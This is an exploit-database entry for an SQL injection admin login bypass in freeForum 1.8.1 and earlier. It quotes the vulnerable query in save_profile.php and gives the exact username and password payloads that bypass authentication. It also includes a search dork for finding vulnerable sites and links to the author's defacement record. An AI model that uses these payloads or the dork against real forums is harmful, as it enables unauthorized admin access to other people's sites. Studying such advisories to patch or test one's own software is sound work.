freeForum <= 1.8.1 Sql Injection Admin Login ByPass

2010-06-25T00:00:00
ID 1337DAY-ID-12929
Type zdt
Reporter Lord-Anubis
Modified 2010-06-25T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===================================================
freeForum <= 1.8.1 Sql Injection Admin Login ByPass 
===================================================


+-------------------------------------------------------------------------------------------------------------------------------+
|				 _______         __                ______     							|
|				|    |  |.--.--.|  |--..-----.    |      |.----..-----..--.--.--.				|
|				|       ||  |  ||    < |  -__|    |   ---||   _||  -__||  |  |  |				|
|				|__|____||_____||__|__||_____|    |______||__|  |_____||________|				|
+-------------------------------------------------------------------------------------------------------------------------------+
| Name: freeForum <= 1.8.1 Sql Injection Admin Login ByPass 									|
| Software: freeForum <= 1.8.1													|
| Site: http://soft.zoneo.net/													|
| Download: http://soft.zoneo.net/freeForum/Files/get.php?freeforum-1.8.1.zip							|
| Vulnerability: Sql Injection Admin Login ByPass										|
| Severity: medium ( low / medium / high )											|
| Tested on: 1.8.1														|
| Dork: "Forum powered by FreeForum"												|
| Requires: magic_quotes_gpc = Off												|
+-------------------------------------------------------------------------------------------------------------------------------+
| Author: Lord-Anubis														|
| Contact: lord.anu bis4[at]gm ail[dot]com											|
| Date: 23.06.2010 ( dd.mm.yyyy )												|
| Site: http://lordanubis.altervista.org/											|
| Defaces: http://www.zone-h.org/archive/notifier=Lord-Anubis									|
| Exploits: http://inj3ct0r.com/author/2486											|
+-------------------------------------------------------------------------------------------------------------------------------+
| Bug File: save_profile.php													|
| 170.	if ($_POST['login'] == "Login") {											|
| 171.		$comanda  = "SELECT * FROM ${tablename}_username WHERE username='".$_POST['username']."' AND			|
| 171.		password=password('".$_POST['password']."')";									|
+-------------------------------------------------------------------------------------------------------------------------------+
| Bug Explanation:														|
|	- EN:	in the file forum.php in the form for the authentication as admin, the fields POST username and password are	|
|		not controlled. Consequently if the magic_quotes_gpcare are set up on OFF in the php.ini, it's possible login	|
|		without knowing the data, with an SQL Injection attack.								|
|		Example:													|
|		POST	Username:	' OR ''='										|
|		POST	Password:	') OR (''='										|
|	////////////////////////////////////////////////////////////////////////////////////////////////////////////////////	|
|	- ITA:	Nel file forum.php nel form per l'autenticazione come Amministratore, non vengono controllati i campi POST	|
|		username e password. Di conseguenza se le magic_quotes_gpc sono impostate a Off nel php.ini, и possibile	|
|		autenticarsi senza conoscere i dati con un attacco di tipo SQL Injection.					|
|		Esempio:													|
|		POST	Username:	' OR ''='										|
|		POST	Password:	') OR (''='										|
|	////////////////////////////////////////////////////////////////////////////////////////////////////////////////////	|
|	- PL:	...														|
+-------------------------------------------------------------------------------------------------------------------------------+



#  0day.today [2018-01-01]  #